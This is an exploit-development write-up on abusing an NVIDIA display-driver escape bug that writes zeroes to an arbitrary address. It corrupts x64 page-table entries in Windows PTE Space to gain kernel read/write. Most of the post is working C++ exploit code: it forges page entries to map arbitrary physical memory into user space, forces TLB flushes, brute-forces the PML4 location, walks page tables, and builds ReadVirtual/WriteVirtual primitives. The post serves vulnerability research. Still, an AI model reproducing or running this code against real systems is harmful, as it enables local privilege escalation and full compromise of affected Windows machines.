Making something out of Zeros: Alternative primitive for Windows Kernel Exploitation

While working on the NVIDIA DxgkDdiEscape Handler exploit, it became obvious that the GDI primitives approach discussed over the last couple of years would be of no help in reliably exploiting this vulnerability.

So we came up with another solution: we could map some specially chosen virtual addresses, forcing their paging entries to be aligned just right, and use the vulnerability to overwrite those paging entries.

In short, that would allow us to map an arbitrary physical address at a virtual address of our own choosing.

In the next sections, we will cover the details of x64 paging tables and the specific techniques used to exploit this vulnerability.

How Paging works in x64:



x64 paging uses 4 levels of tables to map a virtual page to a physical page. They are PML4 (aka PXE), PDPT, PD and PT.

Control Register CR3 contains the (physical) base address of the PML4 table for the current process.

The following figure is an overview of x64 page walking from Virtual to Physical address:

Example:



Say we want to walk the paging tables for virtual address 0x71000000000:

First, we decompose it:

The 12 least significant bits of the virtual address are the page offset; the next 9 bits are the PT index, the next 9 the PD index, the next 9 the PDPT index, and the next 9 the PML4 index. The remaining top 16 bits (48-63) are just copies of bit 47 (a "canonical" address).

I use this struct to do the job:

```cpp
typedef struct VirtualAddressFields
{
    ULONG64 offset : 12;
    ULONG64 pt_index : 9;
    ULONG64 pd_index : 9;
    ULONG64 pdpt_index : 9;
    ULONG64 pml4_index : 9;

    VirtualAddressFields(ULONG64 value)
    {
        *(ULONG64 *)this = 0;
        offset = value & 0xfff;
        pt_index = (value >> 12) & 0x1ff;
        pd_index = (value >> 21) & 0x1ff;
        pdpt_index = (value >> 30) & 0x1ff;
        pml4_index = (value >> 39) & 0x1ff;
    }

    // Note: returns only the low 48 bits (no sign extension for kernel addresses).
    ULONG64 getVA()
    {
        ULONG64 res = *(ULONG64 *)this;
        return res;
    }
} VirtualAddressFields;
```



For example:

```
VirtualAddressFields ADDR1a = 0x71000000000;

0: kd> dt ADDR1a
Local var @ 0x1de4d8 Type VirtualAddressFields
   +0x000 offset     : 0y000000000000 (0)
   +0x000 pt_index   : 0y000000000 (0)
   +0x000 pd_index   : 0y000000000 (0)
   +0x000 pdpt_index : 0y001000000 (0x40)
   +0x000 pml4_index : 0y000001110 (0xe)
```

For our example (VA: 0x71000000000) we got PML4_index=0x0E, PDPT_index=0x40, PD_index=0, PT_index=0, Offset=0.
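The same split can be written in portable C without bitfields. Note that the struct's getVA() hands back only the low 48 bits; to turn indices back into a usable address (kernel addresses in particular), bit 47 has to be sign-extended into bits 48-63. A minimal sketch; va_split and va_join are hypothetical helper names:

```c
#include <stdint.h>

/* The five fields of an x64 4-level virtual address. */
typedef struct {
    unsigned pml4, pdpt, pd, pt;   /* 9-bit table indices */
    unsigned offset;               /* 12-bit page offset */
} va_parts;

/* Split a virtual address into its table indices and page offset. */
static va_parts va_split(uint64_t va)
{
    va_parts p;
    p.offset = (unsigned)(va & 0xfff);
    p.pt     = (unsigned)((va >> 12) & 0x1ff);
    p.pd     = (unsigned)((va >> 21) & 0x1ff);
    p.pdpt   = (unsigned)((va >> 30) & 0x1ff);
    p.pml4   = (unsigned)((va >> 39) & 0x1ff);
    return p;
}

/* Rebuild the address, copying bit 47 into bits 48-63 (canonical form). */
static uint64_t va_join(va_parts p)
{
    uint64_t va = ((uint64_t)p.pml4 << 39) | ((uint64_t)p.pdpt << 30) |
                  ((uint64_t)p.pd << 21) | ((uint64_t)p.pt << 12) | p.offset;
    if (va & (1ULL << 47))
        va |= 0xFFFF000000000000ULL;
    return va;
}
```

For example, va_split(0x71000000000) yields pml4 = 0xe and pdpt = 0x40, matching the dt output above, and va_join(va_split(0xFFFFF900C1F88000)) gives back the full sign-extended kernel address.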





Now we have the PML4 entry for our virtual address: 38a0000040653867

This is actually an 8-byte structure known as an MMPTE, and from it we need to extract the Page Frame Number:
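Extracting the PFN is just a mask and a shift. The sketch below uses the architectural bit layout from the Intel SDM (physical-address bits 12-51), not Windows' own MMPTE definition; the macro and function names are hypothetical:

```c
#include <stdint.h>

/* Architectural x64 paging-entry bits (Intel SDM naming). */
#define PTE_PRESENT   (1ULL << 0)
#define PTE_WRITE     (1ULL << 1)
#define PTE_USER      (1ULL << 2)
#define PTE_LARGE     (1ULL << 7)    /* PS: large page, in PDPTEs and PDEs */
#define PTE_NX        (1ULL << 63)
#define PTE_ADDR_MASK 0x000FFFFFFFFFF000ULL   /* physical-address bits 12-51 */

/* Page Frame Number = physical address of the referenced page / 0x1000. */
static uint64_t pte_pfn(uint64_t entry)
{
    return (entry & PTE_ADDR_MASK) >> 12;
}
```

Applied to 38a0000040653867 this gives PFN 0x40653, with the present, writable and user bits set and the large-page and NX bits clear.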

Now we take this PFN (0x40653), multiply it by the page size (0x1000), and use the result (0x40653000) as the base address of the next paging table (PDPT), with PDPT_index (0x40) as the index into this table. Each entry is 8 bytes, so the PDPT entry sits at 0x40653000 + 0x40 * 8 = 0x40653200:

Again, we take this PFN (0x41cd7), multiply it by the page size (0x1000), and use the result (0x41cd7000) as the base address of the next paging table (PD), with PD_index (0x00) as the index into this table:

The same goes for the last level: we take the PFN (0x3e7d8), multiply it by the page size (0x1000), and use the result (0x3e7d8000) as the base address of the next paging table (PT), with PT_index (0x00) as the index into this table:

Finally, all that's left is to multiply this PFN (0x3d7d9) by the page size (0x1000) and add our page offset (0x000) to the result (0x3d7d9000).

So we now know that our Virtual Address 0x71000000000 is actually mapping Physical Address 0x3d7d9000.
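The whole walk condenses into a short loop. This is a sketch, not the exploit's code: read64 stands in for whatever primitive reads 8 bytes of physical memory, only 4 KB pages are handled, and the CR3 value (0x1aa000) plus the flag bits of the PDPT/PD/PT entries in the demo are hypothetical; only the PML4 entry and the PFNs come from the example above.

```c
#include <stdint.h>

#define ENTRY_PRESENT   1ULL
#define ENTRY_ADDR_MASK 0x000FFFFFFFFFF000ULL  /* bits 12-51: PFN * 0x1000 */

/* Reads 8 bytes of physical memory (in the exploit: the remapping primitive). */
typedef uint64_t (*read_phys64_fn)(uint64_t phys_addr);

/* Walks PML4 -> PDPT -> PD -> PT for a 4 KB mapping (large pages not handled).
   Returns 1 and stores the physical address in *pa_out, or 0 if an entry is not present. */
static int walk_4k(read_phys64_fn read64, uint64_t pml4_base, uint64_t va, uint64_t *pa_out)
{
    static const unsigned shifts[4] = { 39, 30, 21, 12 };  /* PML4, PDPT, PD, PT index */
    uint64_t table = pml4_base & ENTRY_ADDR_MASK;
    for (int level = 0; level < 4; level++) {
        uint64_t index = (va >> shifts[level]) & 0x1ff;
        uint64_t entry = read64(table + index * 8);        /* 8-byte entries */
        if (!(entry & ENTRY_PRESENT))
            return 0;
        table = entry & ENTRY_ADDR_MASK;                    /* next table (or final page) */
    }
    *pa_out = table | (va & 0xfff);                         /* add the page offset */
    return 1;
}

/* Demo only: fake physical memory holding the four entries of the example walk.
   DEMO_CR3 and the flags of the last three entries are hypothetical. */
#define DEMO_CR3 0x1aa000ULL
static uint64_t demo_read64(uint64_t pa)
{
    switch (pa) {
    case DEMO_CR3 + 0x0e * 8:      return 0x38a0000040653867ULL; /* PML4E -> PDPT 0x40653000 */
    case 0x40653000ULL + 0x40 * 8: return 0x0000000041cd7867ULL; /* PDPTE -> PD 0x41cd7000 */
    case 0x41cd7000ULL:            return 0x000000003e7d8867ULL; /* PDE -> PT 0x3e7d8000 */
    case 0x3e7d8000ULL:            return 0x000000003d7d9867ULL; /* PTE -> page 0x3d7d9000 */
    default:                       return 0;                     /* not present */
    }
}
```

With those demo entries, walk_4k(demo_read64, DEMO_CR3, 0x71000000000, &pa) stores 0x3d7d9000 in pa, while an address whose PDPT entry is absent (such as 0x72000000000) makes it return 0.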

If you want to dig deeper into x64 paging, this suggested reading might be helpful:

- Getting Physical: Extreme abuse of Intel based Paging Systems - Part 1

- Getting Physical: Extreme abuse of Intel based Paging Systems - Part 2 - Windows

- Getting Physical: Extreme abuse of Intel based Paging Systems - Part 3 - Windows HAL's Heap

The NVIDIA Vulnerability:

These were first reported by Google Project Zero: there were a bunch of vulnerabilities in various PDXGKDDI_ESCAPE callbacks, an interface for sharing data between the user-mode display driver and the display miniport driver.

After some research we decided to focus on ‘NVIDIA: Unchecked write to user provided pointer in escape 0x600000D’, a vulnerability that gave us the ability to write to an arbitrary virtual address, but with no control over the data being written or its size. In fact, most of the data written is zeroes, and the code enforces a size check that requires us to write at least 0x1000 (4096) bytes.

Original PoC: https://bugs.chromium.org/p/project-zero/issues/detail?id=911&can=1&q=NVIDIA%20escape

Exploiting:

The lack of control over the data being written or its size forced us to discard the GDI primitives we've been using lately, so we figured we would need to do something different.

A solution emerged (on Windows builds earlier than the Anniversary Update) by abusing the fact that the paging tables discussed in “How Paging works in x64” ALSO reside in a region of virtual memory sometimes called "PTE Space".

PTE Space is a region of virtual memory the Windows kernel uses when it needs to manage the paging structures (changing page access rights, moving pages to the pagefile, working with memory-mapped files, etc.).

With some bit shifting and masking, we can calculate the virtual address (in PTE Space) of each level's paging entry for any given virtual address.

(Taken from: https://github.com/JeremyFetiveau/Exploits/blob/master/Bypass_SMEP_DEP/mitigation%20bypass/Computations.cpp)

```cpp
#define PXE_PAGES_START 0xFFFFF6FB7DBED000 // PML4
#define PDPT_PAGES_START 0xFFFFF6FB7DA00000
#define PDE_PAGES_START 0xFFFFF6FB40000000
#define PTE_PAGES_START 0xFFFFF68000000000

ULONG64 GetPML4VirtualAddress(ULONG64 vaddr) {
    vaddr >>= 36;
    vaddr >>= 3;
    vaddr <<= 3;
    vaddr &= 0xfffff6fb7dbedfff;
    vaddr |= PXE_PAGES_START;
    return vaddr;
}

ULONG64 GetPDPTVirtualAddress(ULONG64 vaddr) {
    vaddr >>= 27;
    vaddr >>= 3;
    vaddr <<= 3;
    vaddr &= 0xfffff6fb7dbfffff;
    vaddr |= PDPT_PAGES_START;
    return vaddr;
}

ULONG64 GetPDEVirtualAddress(ULONG64 vaddr) {
    vaddr >>= 18;
    vaddr >>= 3;
    vaddr <<= 3;
    vaddr &= 0xfffff6fb7fffffff;
    vaddr |= PDE_PAGES_START;
    return vaddr;
}

ULONG64 GetPTEVirtualAddress(ULONG64 vaddr) {
    vaddr >>= 9;
    vaddr >>= 3;
    vaddr <<= 3;
    vaddr &= 0xfffff6ffffffffff;
    vaddr |= PTE_PAGES_START;
    return vaddr;
}
```

Again, for our example Virtual Address 0x71000000000:

GetPML4VirtualAddress(0x71000000000) gives us 0xFFFFF6FB7DBED070
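An equivalent, commonly used formulation (not the one in Computations.cpp) computes only the PTE address and obtains the higher levels by applying the same formula again, which works because the PML4 maps itself at slot 0x1ed. A sketch with hypothetical function names, assuming the fixed base 0xFFFFF68000000000 from the defines above:

```c
#include <stdint.h>

/* Fixed PTE Space base used before the Anniversary Update (PTE_PAGES_START above). */
#define PTE_BASE 0xFFFFF68000000000ULL

/* VA of the PTE mapping 'va': one 8-byte entry per 4 KB page, so shift by 12 - 3 = 9
   and keep the 36 index bits (scaled by 8) before adding the base. */
static uint64_t pte_va(uint64_t va)
{
    return ((va >> 9) & 0x7FFFFFFFF8ULL) + PTE_BASE;
}

/* The PML4 maps itself, so feeding a PTE-Space address back in climbs one level. */
static uint64_t pde_va(uint64_t va)   { return pte_va(pte_va(va)); }
static uint64_t pdpte_va(uint64_t va) { return pte_va(pde_va(va)); }
static uint64_t pml4e_va(uint64_t va) { return pte_va(pdpte_va(va)); }

/* PML4 slot of the self-reference, derived from the base: 0x1ed. */
static unsigned self_ref_index(void)
{
    return (unsigned)((PTE_BASE >> 39) & 0x1ff);
}
```

pde_va(0x71000000000) and pml4e_va(0x71000000000) yield 0xFFFFF6FB41C40000 and 0xFFFFF6FB7DBED070, the same values GetPDEVirtualAddress and GetPML4VirtualAddress produce.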

Remapping Primitive (overview):

At this point we have all the elements needed to draw an attack plan:

- The vulnerability allows us to write a bunch of zeroes to an arbitrary virtual address.

- Paging entries in PTE Space can be written by the vulnerability.

- Tampering with a paging entry's PFN could allow us to map any physical address.

We could use VirtualAlloc to get a chosen VA mapped (e.g. 0x71000000000; call it ADDR1a) and smash its PD entry in PTE Space (i.e. FFFFF6FB41C40000) so that its PFN points to physical address zero.

It would look like this:

At this point, our primitive is set up and ready.

We can start making use of it by writing something that looks like a valid _MMPTE at address 0x71080000000 (ADDR2a), and then reading from/writing to virtual address 0x71000000000 (ADDR1a).

Here are some macros to do that.

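```cpp
// GetPageEntry reads entries of whatever page is currently mapped at ADDR1a;
// SetPageEntry writes (through ADDR2a) the _MMPTE that controls what ADDR1a maps.
#define GetPageEntry(index) (((PMMPTE)(ADDR1a))[(index)])
#define SetPageEntry(index, value) (((PMMPTE)(ADDR2a))[(index)]=(value))
```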

Physical address zero:

We're using physical address zero because our vulnerability only allows us to write zeroes. But why does it work? If physical address zero were invalid, our attempts would BSOD instantly.

Well... we're in luck: physical address zero holds the Interrupt Vector Table (IVT) used by real mode and, in our tests, always seems to be a valid physical address.

Remapping Mechanics in depth:

This animated graph shows an overview of the Remapping mechanics:

Problems:

1) Preserving the _MMPTE flags. We need to keep at least 3 of the 12 flag bits intact (present, writable and user-accessible, bits 0-2) to be able to read/write our spuriously mapped page from ring 3.

We can solve this by offsetting our write by 1 byte (i.e. writing at FFFFF6FB41C40001 instead of FFFFF6FB41C40000). The entry's lowest byte, which holds those flags, is left untouched, while the zeroes still wipe out the PFN.

2) The vulnerability requires that we write at least 0x1000 bytes. If we start writing ADDR1a's PD entry at FFFFF6FB41C40001, the write runs past the end of that PD page, so we need to make sure the next page (starting at FFFFF6FB41C41000) is also a valid address. We can solve this by using VirtualAlloc again, this time mapping 0x71040000000 (ADDR1b).

After decomposition, 0x71040000000 looks like this (note that the only change from ADDR1a is PDPT_index = 0x41 instead of 0x40):

Calling GetPDEVirtualAddress(0x71040000000) gives us FFFFF6FB41C41000: ADDR1b's PD page is exactly the page our write spills into, so mapping ADDR1b solves the second problem.
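The effect of problems 1 and 2 can be simulated in user mode. In this sketch (hypothetical names and entry values), a 2-page buffer stands in for ADDR1a's PD page followed by ADDR1b's, and the bug is modelled as a memset of zeroes starting at byte 1:

```c
#include <stdint.h>
#include <string.h>

#define PAGE_BYTES 0x1000

/* Two consecutive PTE-Space pages: ADDR1a's PD page, then ADDR1b's. */
static uint8_t pd_pages[2 * PAGE_BYTES];

/* Entries are stored little-endian, as on x64 (assumes a little-endian host). */
static void store_entry(unsigned index, uint64_t value)
{
    memcpy(pd_pages + (size_t)index * 8, &value, sizeof value);
}

static uint64_t load_entry(unsigned index)
{
    uint64_t value;
    memcpy(&value, pd_pages + (size_t)index * 8, sizeof value);
    return value;
}

/* Models the bug: 'len' zero bytes written starting at byte 1 of entry 0. */
static void buggy_zero_write(size_t len)
{
    memset(pd_pages + 1, 0, len);
}
```

After buggy_zero_write(0x1000), an entry of 0x2a5b4867 in slot 0 becomes 0x67: the present, writable and user bits survive while the PFN is now 0. The rest of the first page is zeroed, and exactly one byte of the next page (the low byte of entry 512) is clobbered.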

3) This one is a little more complex and hardware/OS dependent. For performance reasons, the CPU caches address translations in the TLB (Translation Lookaside Buffer).

After using our mapping primitive we need a way to invalidate or flush the TLB; otherwise the changes made to the paging tables won't take effect immediately (the old values are still cached).

Getting Windows to trigger a TLB flush seems to be very hardware dependent. On some processors a page fault could be enough, on others a task switch (CR3 reload) is required, and in some cases even that isn't enough and an IPI (Inter-Processor Interrupt) may be required.

The way I solved this (though it's not 100% reliable) is to try all of the above.

```cpp
// Helpers that try, in several ways, to get stale TLB entries flushed.
LPVOID pNoAccess = NULL;
STARTUPINFOA si = { 0 };
PROCESS_INFORMATION pi = { 0 };

typedef NTSTATUS(__stdcall *_NtQueryIntervalProfile)(DWORD ProfileSource, PULONG Interval);
_NtQueryIntervalProfile NtQueryIntervalProfile;

VOID InitForgeMapping()
{
    // Touching a PAGE_NOACCESS page always raises a fault.
    pNoAccess = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_NOACCESS);
    dprint("NOACCESS Page at %llx", pNoAccess);

    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryIntervalProfile");

    // Suspended helper process, used below to force address-space switches.
    char cmdLine[] = "notepad.exe";   // writable command-line buffer
    si.cb = sizeof(si);               // required by CreateProcess
    CreateProcessA(NULL, cmdLine, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
}

VOID ForcePageFault()
{
    DWORD cnt = 0;
    while (cnt < 5) {
        __try {
            *(BYTE *)pNoAccess = 0;   // access violation, swallowed below
        }
        __except (EXCEPTION_EXECUTE_HANDLER) {}
        cnt++;
    }
}

void ForceTaskSwitch()
{
    BYTE buffer = 0;
    SIZE_T _tmp = 0;
    // Cross-process operations on the helper are meant to force a CR3 switch.
    ReadProcessMemory(pi.hProcess, (LPCVOID)0x10000, &buffer, 1, &_tmp);
    ReadProcessMemory(GetCurrentProcess(), (LPCVOID)&_tmp, &buffer, 1, &_tmp);
    FlushInstructionCache(pi.hProcess, (LPCVOID)0x10000, 1);
    FlushInstructionCache(GetCurrentProcess(), (LPCVOID)&ForceTaskSwitch, 100);
}

void ForceSyscall()
{
    ULONG dummy = 0;
    NtQueryIntervalProfile(2, &dummy);   // a cheap kernel round trip
}

VOID MapPageAsUserRW(ULONG64 PhysicalAddress)
{
    if (!pNoAccess)
        InitForgeMapping();

    // Forge a present, user-accessible, writable entry for the target page.
    MMPTE NewMPTE = { 0 };
    NewMPTE.u.Hard.Valid = TRUE;
    NewMPTE.u.Hard.Write = TRUE;
    NewMPTE.u.Hard.Owner = TRUE;
    NewMPTE.u.Hard.Accessed = TRUE;
    NewMPTE.u.Hard.Dirty = TRUE;
    NewMPTE.u.Hard.Writable = TRUE;
    NewMPTE.u.Hard.PageFrameNumber = (PhysicalAddress >> 12) & 0xfffffff;

    // Written through ADDR2a, so ADDR1a now maps PhysicalAddress...
    SetPageEntry(0, NewMPTE);

    // ...then try to get rid of the stale translation.
    ForcePageFault();
    ForceTaskSwitch();
    ForceSyscall();
}
```
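For reference, the hardware fields MapPageAsUserRW sets correspond to these architectural bits. A sketch (hypothetical names) that builds the raw 64-bit value directly; it leaves out any Windows-specific software bits, whose positions depend on the MMPTE definition in use, and keeps the same 28-bit PFN mask as the code above:

```c
#include <stdint.h>

/* Architectural bit positions (Intel SDM). */
#define PTE_P  (1ULL << 0)   /* present */
#define PTE_RW (1ULL << 1)   /* writable */
#define PTE_US (1ULL << 2)   /* user-accessible */
#define PTE_A  (1ULL << 5)   /* accessed */
#define PTE_D  (1ULL << 6)   /* dirty */

/* Builds a raw 8-byte PTE mapping 'phys' as a user read/write 4 KB page. */
static uint64_t make_user_rw_pte(uint64_t phys)
{
    uint64_t pfn = (phys >> 12) & 0xfffffff;   /* page offset bits are dropped */
    return (pfn << 12) | PTE_P | PTE_RW | PTE_US | PTE_A | PTE_D;
}
```

make_user_rw_pte(0x3d7d9000) returns 0x3d7d9067.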

4) We need to know the actual physical address of the PML4 table (the value of CR3); otherwise it would not be possible to remap a target virtual address onto the one under our control.

Let's say we know there's a certain interesting value at virtual address 0xFFFFF900C1F88000 that we want to overwrite. We would need to walk the paging tables, PML4-->PDPT-->PD-->PT-->[physical address], and then write a valid _MMPTE with that physical address to ADDR2a (i.e. 0x71080000000).

Then, when we write to ADDR1a (i.e. 0x71000000000), we are writing the same physical memory as if we were writing to 0xFFFFF900C1F88000.

Guessing CR3:

To start walking the paging tables we are _required_ to know the physical address of PML4.

On newer hardware, we could use Enrique Nissim's technique to guess our PML4 entry on the latest Windows 10 editions.

(check Enrique's paper and code here: https://github.com/IOActive/I-know-where-your-page-lives)

But we'll focus on older hardware/Windows versions (Windows 7/8/8.1 and 10 Gold), where we can solve this with brute force.



We can query the registry for valid physical address ranges (take a look at HKLM\HARDWARE\RESOURCEMAP\System Resources\Physical Memory).

For simplicity, I'll assume the largest range in there is RAM (though this won't be the case 100% of the time).

We can then try every physical page in that range until we find one with the correct PML4 self-reference entry at index 0x1ed, i.e. an entry whose PFN points back to the page itself.

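```cpp
// memRange: the physical range picked from the registry (assumed to be RAM).
MMPTE PML4DataCandidate;
ULONG64 RecoveredPfn;

for (ULONG64 physical_address = memRange->start; physical_address < memRange->end; physical_address += 0x1000) {
    // Map the candidate page and read its would-be self-reference entry.
    MapPageAsUserRW(physical_address);
    PML4DataCandidate = GetPageEntry(0x1ed);

    // Follow that entry (this remaps ADDR1a to the page it points to).
    ULONG64 _filterResult = RemapEntry(PML4DataCandidate, 0);
    if (!_filterResult)
        continue;

    // For a real PML4, the entry points back to the candidate page itself.
    PML4DataCandidate = GetPageEntry(0x1ed);
    RecoveredPfn = (ULONG64)PML4DataCandidate.u.Hard.PageFrameNumber << 12;
    if (RecoveredPfn != physical_address)
        continue;

    dprint("Match at addr - %llx", physical_address);
    gPML4Address = physical_address;
    dprint("PML4 at %llx", gPML4Address);
}
```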
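Stripped of the remapping, the test in that loop asks whether the entry at index 0x1ed points back to the page itself. A simplified sketch with a single check instead of the two-step remap above; read_entry is a hypothetical callback standing in for MapPageAsUserRW plus GetPageEntry, and the demo page address and flags are made up. Bear in mind that each process's PML4 carries this same self-reference, so a match identifies a PML4 but not, by itself, whose.

```c
#include <stdint.h>

#define SELF_REF_INDEX  0x1ed
#define ENTRY_PRESENT   1ULL
#define ENTRY_ADDR_MASK 0x000FFFFFFFFFF000ULL

/* Reads entry 'index' of the 4 KB page at physical address 'page_pa'. */
typedef uint64_t (*read_entry_fn)(uint64_t page_pa, unsigned index);

/* A page is a PML4 candidate if its self-reference slot is present
   and points back at the page itself. */
static int looks_like_pml4(read_entry_fn read_entry, uint64_t page_pa)
{
    uint64_t e = read_entry(page_pa, SELF_REF_INDEX);
    return (e & ENTRY_PRESENT) && (e & ENTRY_ADDR_MASK) == page_pa;
}

/* Scans [start, end) page by page; returns the first candidate, or 0. */
static uint64_t find_pml4(read_entry_fn read_entry, uint64_t start, uint64_t end)
{
    for (uint64_t pa = start & ~0xfffULL; pa < end; pa += 0x1000)
        if (looks_like_pml4(read_entry, pa))
            return pa;
    return 0;
}

/* Demo only: fake RAM in which the page at 0x1aa000 references itself. */
static uint64_t demo_read_entry(uint64_t page_pa, unsigned index)
{
    if (page_pa == 0x1aa000ULL && index == SELF_REF_INDEX)
        return 0x1aa000ULL | 0x63;   /* present, RW, accessed, dirty */
    return 0;
}
```

find_pml4(demo_read_entry, 0x100000, 0x200000) returns 0x1aa000.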

5) We won't be able to walk EVERY paging entry to the point of recovering a final physical address.

Memory paged out to the pagefile is an issue, as are memory-mapped files and other flags that defer the real value of the PFN. Luckily, this doesn't seem to affect our scan for the PML4 base.

Recovering PFNs:

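```cpp
// Maps the page referenced by a paging entry at ADDR1a.
// Returns 0 if the entry can't be followed, 1 if the referenced page was mapped
// (the next-level table, or the final page at PT level), and 2 for a large page.
ULONG64 RemapEntry(MMPTE x, ULONG64 vaddress)
{
    if (x.u.Hard.Valid) { // Valid (Present)
        if (x.u.Hard.PageFrameNumber == 0)
            return 0;

        if (x.u.Hard.LargePage) { // if LargePage is set we don't need to walk any further
            // Assumes a 2 MB page: select the 4 KB page within it (bits 12-20).
            ULONG64 finaladdress = ((ULONG64)x.u.Hard.PageFrameNumber << 12) | (vaddress & 0x1ff000);
            MapPageAsUserRW(finaladdress);
            return 2;
        } else {
            MapPageAsUserRW((ULONG64)x.u.Hard.PageFrameNumber << 12);
            return 1;
        }
    }
    return 0;
}
```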
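RemapEntry treats every large page as a 2 MB page. For reference, the Intel SDM defines the final address for both large-page sizes as below; in a 2 MB PDE, bit 12 is the PAT bit rather than part of the address, which is why it is masked off. Function names are hypothetical:

```c
#include <stdint.h>

/* PDE with PS=1: maps 2 MB, address bits 21-51 (bit 12 is PAT). */
static uint64_t large_page_pa_2m(uint64_t pde, uint64_t va)
{
    return (pde & 0x000FFFFFFFE00000ULL) | (va & 0x1FFFFFULL);
}

/* PDPTE with PS=1: maps 1 GB, address bits 30-51. */
static uint64_t large_page_pa_1g(uint64_t pdpte, uint64_t va)
{
    return (pdpte & 0x000FFFFFC0000000ULL) | (va & 0x3FFFFFFFULL);
}
```

For a 1 GB page, masking vaddress with 0x1ff000 as RemapEntry does would drop bits 21-29 of the offset.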

Remapping a target virtual address (code):

```cpp
// Bail out if an entry can't be followed; stop early once a large page
// has already mapped the final physical page.
#define CHECK_RESULT \
    if (!page_entry.u.Hard.PageFrameNumber) return 0; \
    if (_filterResult == 0) return 0; \
    if (_filterResult == 2) return 1;

int MapVirtualAddress(ULONG64 pml4_address, ULONG64 vaddress)
{
    VirtualAddressFields RequestedVirtualAddress = vaddress;

    MapPageAsUserRW(pml4_address);

    // PML4e
    MMPTE page_entry = GetPageEntry(RequestedVirtualAddress.pml4_index);
    ULONG64 _filterResult = RemapEntry(page_entry, vaddress);
    CHECK_RESULT

    // PDPTe
    page_entry = GetPageEntry(RequestedVirtualAddress.pdpt_index);
    _filterResult = RemapEntry(page_entry, vaddress);
    CHECK_RESULT

    // PDe
    page_entry = GetPageEntry(RequestedVirtualAddress.pd_index);
    _filterResult = RemapEntry(page_entry, vaddress);
    CHECK_RESULT

    // PTe: on success, ADDR1a now maps the target page
    page_entry = GetPageEntry(RequestedVirtualAddress.pt_index);
    _filterResult = RemapEntry(page_entry, vaddress);
    CHECK_RESULT

    return 1;
}
```

Read/Write primitive (minimal):

```cpp
BOOL WriteVirtual(ULONG64 dest, BYTE *src, DWORD len)
{
    VirtualAddressFields dstflds = dest;
    ULONG64 destAligned = dest & 0xfffffffffffff000;

    // Only one page is mapped at ADDR1a: refuse writes that cross a page boundary.
    if (dstflds.offset + len > 0x1000)
        return FALSE;

    if (MapVirtualAddress(gPML4Address, destAligned)) {
        memcpy((LPVOID)(ADDR1a | dstflds.offset), src, len);
    } else {
        return FALSE;
    }
    return TRUE;
}

BOOL ReadVirtual(ULONG64 src, BYTE *dest, DWORD len)
{
    VirtualAddressFields srcflds = src;
    ULONG64 srcAligned = src & 0xfffffffffffff000;

    // Same single-page restriction as WriteVirtual.
    if (srcflds.offset + len > 0x1000)
        return FALSE;

    if (MapVirtualAddress(gPML4Address, srcAligned)) {
        memcpy((LPVOID)dest, (LPVOID)(ADDR1a | srcflds.offset), len);
    } else {
        return FALSE;
    }
    return TRUE;
}
```
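WriteVirtual and ReadVirtual only ever map one page at ADDR1a, so larger copies have to be split at 4 KB boundaries. A sketch of such a wrapper; read_page is a hypothetical callback playing the role of ReadVirtual, and the demo backing memory is made up:

```c
#include <stdint.h>
#include <stddef.h>

/* Copies one chunk that lies within a single 4 KB page (e.g. ReadVirtual). */
typedef int (*read_page_fn)(uint64_t va, uint8_t *dst, size_t len);

/* Splits [va, va + len) at page boundaries so every call stays in one page. */
static int read_virtual_chunked(read_page_fn read_page, uint64_t va, uint8_t *dst, size_t len)
{
    while (len > 0) {
        size_t room = 0x1000 - (size_t)(va & 0xfff);   /* bytes left in this page */
        size_t chunk = len < room ? len : room;
        if (!read_page(va, dst, chunk))
            return 0;
        va += chunk;
        dst += chunk;
        len -= chunk;
    }
    return 1;
}

/* Demo only: each byte reads as the low 8 bits of its address; counts calls. */
static unsigned demo_calls;
static int demo_read_page(uint64_t va, uint8_t *dst, size_t len)
{
    if ((va & 0xfff) + len > 0x1000)
        return 0;                        /* would cross a page: reject */
    for (size_t i = 0; i < len; i++)
        dst[i] = (uint8_t)(va + i);
    demo_calls++;
    return 1;
}
```

A 0x20-byte read starting at 0x1ff0 is issued as two 0x10-byte page-local reads.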

6) Fixing the PFN database and Working Set List is a Catch-22:

After successfully exploiting, if we were to terminate our exploit process the machine would BSOD.

The Windows memory manager will try to reclaim the now unused pages and, while doing so, hit our mismatched entries in both the PFN database (nt!MmPfnDatabase) and the process's Working Set (EPROCESS->Vm->VmWorkingSetList->Wsle).

We could walk the PFN database looking for an MMPFN entry whose PteAddress matches our page entry address. That would give us back the original PFN and the correct WsIndex for our tampered page, which is enough data to restore our entries to normal behavior.
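Because the PFN database is an array indexed by PFN, the index of the matching entry is the original PFN. A sketch of that search over a hypothetical, heavily simplified entry type; the real MMPFN layout is different and version specific, and only the two fields mentioned above are modelled:

```c
#include <stdint.h>
#include <stddef.h>

/* Hypothetical stand-in for MMPFN: NOT the real layout. */
typedef struct {
    uint64_t pte_address;   /* VA of the paging entry that maps this page */
    uint32_t ws_index;      /* working-set list index */
} pfn_entry_sketch;

/* Returns 1 and the original PFN / WsIndex if some entry's pte_address matches. */
static int find_original_pfn(const pfn_entry_sketch *db, size_t count,
                             uint64_t pte_va, uint64_t *pfn_out, uint32_t *ws_out)
{
    for (size_t pfn = 0; pfn < count; pfn++) {
        if (db[pfn].pte_address == pte_va) {
            *pfn_out = pfn;              /* the array index is the PFN */
            *ws_out = db[pfn].ws_index;
            return 1;
        }
    }
    return 0;
}
```

In the exploit the lookup key would be the tampered entry's PTE Space address, such as FFFFF6FB41C40000 for ADDR1a's PD entry.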

The bad news is that, in reality, as soon as we restore one of our two tampered paging entries (ADDR1a or ADDR2a) to its original state, we lose the read-write primitive, making it impossible to fix both entries with this technique alone.

The way I solved this problem is by combining this technique with the one described in "Abusing GDI for ring0 exploit primitives".

Use the paging table primitives to corrupt a bitmap, and from there use the GDI primitives to restore the relevant MmPfnDatabase entries.

Conclusion:

This was a hard vulnerability to exploit, given the constraints of the bug, the fact that real hardware was needed (no virtual machine debugging possible), and the added instability caused by the Windows Working Set trimmer doing its regular job.

We hope this technique, albeit incomplete and sort of already out of fashion, could still be of use to other exploit developers.